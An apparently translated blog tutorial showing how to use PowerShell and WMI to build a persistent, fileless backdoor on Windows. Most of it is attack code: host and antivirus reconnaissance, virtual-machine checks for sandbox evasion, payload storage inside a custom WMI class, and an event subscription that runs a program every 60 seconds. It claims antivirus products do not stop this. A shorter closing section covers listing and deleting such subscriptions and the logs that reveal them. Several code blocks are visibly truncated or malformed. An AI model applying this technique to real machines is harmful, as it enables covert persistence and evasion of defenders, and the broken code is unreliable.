Abusing Windows Management Instrumentation (WMI) to Build a persistent, Asynchronous and Fileless Backdoor

Share on FacebookTweet about this on TwitterShare on LinkedInShare on RedditShare on Google+Share on TumblrPin on PinterestDigg this

Matt Graeber showed the method on performing WMI attacks and its effects, but he didn’t talk much about the details. Therefore, this paper mainly details about using powershell to implement WM attacks.

0x01 Introduction

In intranet penetration, wmiexec is the most commonly seen tool that frequently uses WMI, which is previously mentioned in http://drops.wooyun.org/tips/7358. So remote WMI will not be the focus here.

Related reference



0x02 Testing Environment

OS: win8 x32 powershell v3(default installation by Win ), the Winmgmt service enabled to support WMI.

0x03 WMI attacks

Note: The following are all powershell code.

  1. Detection

OS related information

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

Files/directory list
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
Disk volume list
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
Registry operations
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

As shown in the figure below

Current processhklm

Current process
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

List service

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service


Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

Logged On User

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser


Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share


Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

AV product

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
  1. Detecting virtual machines

(1) Determine TotalPhysicalMemory and NumberOfLogicalProcessors

$VMDetected = $False
$Arguments = @{
 Class = 'Win32_ComputerSystem'
 Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
if (Get-WmiObject @Arguments) { 
$VMDetected = $True
"In vm"
 "Not in vm"

(2) Determine the process of virtual machine

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE
"%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) 
{ $VMwareDetected = $True 
"in vm"
"not in vm"

3.Persistance payload

[Administrative permission]

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Properties.Add('EvilProperty' , "This is payload")

As shown in the figure below


It can be encrypted and saved at this position, decoded when executing to achieve that no file is saved on the drive.

4.Program running stealthily at regular time

[Administrative permission]

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=

$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=

As shown in the figure below

Execute notepad.exe every 60s


The stuxnet has already used this backdoor that is implemted through mof.
Until today many are using this backdoor method.
AV products won’t kill this behavior.

0x04 Detect WMI backdoor and delete

1.View the current WMI event

[Administrative permission]

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

As shown in the figure below

pc user

2.Delete the backdoor

[Administrative permission]

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

As shown in the figure below

ps c

0x05 Summary

There more other ways than powershell to implement WMI attacks, such as

– vbs
– mof
– C/C++ via IWbem* COM API
– .NET System.Management classe

There are many detection methods, for example, view the logs

– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM

Or this method can be permanently blocked by disabling the Winmgmt service.


Share on FacebookTweet about this on TwitterShare on LinkedInShare on RedditShare on Google+Share on TumblrPin on PinterestDigg this